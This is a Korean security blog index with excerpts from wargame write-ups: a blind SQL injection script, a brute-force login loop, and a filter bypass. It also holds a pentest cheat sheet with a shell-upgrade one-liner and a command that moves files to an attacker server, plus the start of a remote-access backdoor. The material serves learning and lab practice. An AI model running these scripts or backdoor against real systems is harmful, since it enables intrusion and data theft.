전체 글

초보 개발자 효모입니다.
오늘은 22번 문제를 풀겁니다. 일단 페이지 소스를 보면 "admin'"을 사용해서 블라인드 인젝션이 가능할 것 같습니다. admin' and len(pw) = 10 -- - 이렇게 비밀번호는 10자리라는 걸 알 수 있습니다. 파이썬으로 자동화 해보겠습니다. from requests import get url = 'http://suninatas.com/challenge/web22/web22.asp' password = '' for i in range(1, 10 + 1): for j in range(33, 128): par = f"?id=admin' and unicode(substring(pw,{i},1))={j}--&pw=hyomo" cookies = {'ASPSESSIONIDAACDSAQA': '자신의..
오늘은 8번째 문제를 풀어볼 겁니다 페이지 소스 먼저 보겠습니다. 힌트를 보니 아이디는 admin이고 비밀번호는 0부터 9999까지 사이라고 합니다. 브루트포스를 하면 플래그를 얻을 수 있을 것 같아 파이썬 코드를 짜봤습니다. from tqdm import tqdm from requests import post for i in tqdm(range(0, 9999 + 1)): posts = { 'id': 'admin', 'pw': i } attack = post('http://suninatas.com/challenge/web08/web08.asp',data=posts) if "Password Incorrect!" not in attack.text: print(f"password is {i}") break 이..
이번에는 3번 문제를 풀어보도록 하겠습니다. 처음에 소스코드를 봤지만 아무것도 없어서 이건 다른곳에서 푸는 문제라는 걸 생각했습니다. 그래서 말 그대로 한번 게시판에 들어가봤습니다. 하지만 글을 쓰는 곳이 없었습니다. free 쪽으로 가보도록 하겠습니다. free 쪽에는 글쓰는 곳이 있어서 거기로 이동했더니 url이 이렇습니다. 이 url은 아까 형식에 맞춰서 들어가면 여기에 글씨를 쓰면 클리어가 되는 걸 볼 수 있습니다.
이번 문제는 2번입니다. 무슨 시도를 해도 안되길래 소스코드를 열어봤습니다. id랑 패스워드가 같으면 실행되는 문제인것 같습니다 아이디와 패스워드가 같으면 문제가 해결되는 문제 같아서 웹에다 해보니 안돼서 콘솔에 진행해 보았습니다. 입력하니 답이 나왔습니다.
오늘은 써나니타스 문제 1번을 풀도록 하겠습니다. 코드를 보면 Replace 우회기법을 사용하면 성공할수 있을 것 같은 에감이 듭니다. result = Replace(str,"a","aad") 이 코드는 'str' 변수에서 모든 "a"를 "aad"로 대체(교체)하는 역할을 합니다. 예를 들어, "amin"이라는 문자열은 "admin"로 변경됩니다. result = Replace(result,"i","in") 이 코드는 'str' 변수에서 모든 "i"를 "in"로 대체(교체)하는 역할을 합니다. 이것을 응용해서 admin을 출력하게 만들어보도록 하겠습니다. ami를 입력해 봅니다 admin으로 입력되어서 클리어가 되는 걸 볼 수 있습니다.
내가 쓸려고 올리는 글 python3 -c 'import pty;pty.spawn("/bin/bash")' 내 리눅스 서버에서 공격자 서버로 파일 옮기기 python3 -m http.server 8443 다운로드 wget http://[내아이피]:8443/파일
· Python
이 소프트웨어는 교육 목적으로만 사용됩니다! 누구에게도 피해를 입히는 데 사용하지 마십시오! 내 응용 프로그램을 사용하면 귀하는 모든 규칙에 자동으로 동의하고 귀하의 행동에 대한 책임을 집니다! 법률 위반은 심각한 결과를 초래할 수 있습니다! 개발자 hyomo는 이 프로그램으로 인한 오용이나 손상에 대해 책임지지 않습니다. 오늘은 백도어를 만들어 보도록 하겠습니다 server.pyimport socket, os class RAT_SERVER: def __init__(self, host, port): self.host = host self.port = port def build_connection(self): global client, addr, s s = socket.socket(socket.AF_INE..
· 모의해킹
1. searchsploit이란 우리가 모의해킹을 할 때 보안 취약점과 exploit검색하는 명령어 도구입니다. 정보 수집과 보안 분석에 유용하게 쓸 수 있습니다. exploitdb에서 검색하기 귀찮을 때 유용합니다. 물론 여기 있는 정보들은 대부분 exploitdb에서 가져온 정보들입니다. 칼리리눅스를 사용하고 있다면 searchsploit 명령어로 쓸 수 있습니다. > searchsploit 예를 들어 이렇게 활용할 수 있습니다 PATH: 취약점 공격코드들 경로 Exploit Title: 취약점 제목들 url로 정보를 확인하고 싶으면 -w 옵션을 주시면 됩니다. exploit 코드를 가져올려면 -m 를 입력하면 됩니다.
Hyomo IT
효모의 IT 블로그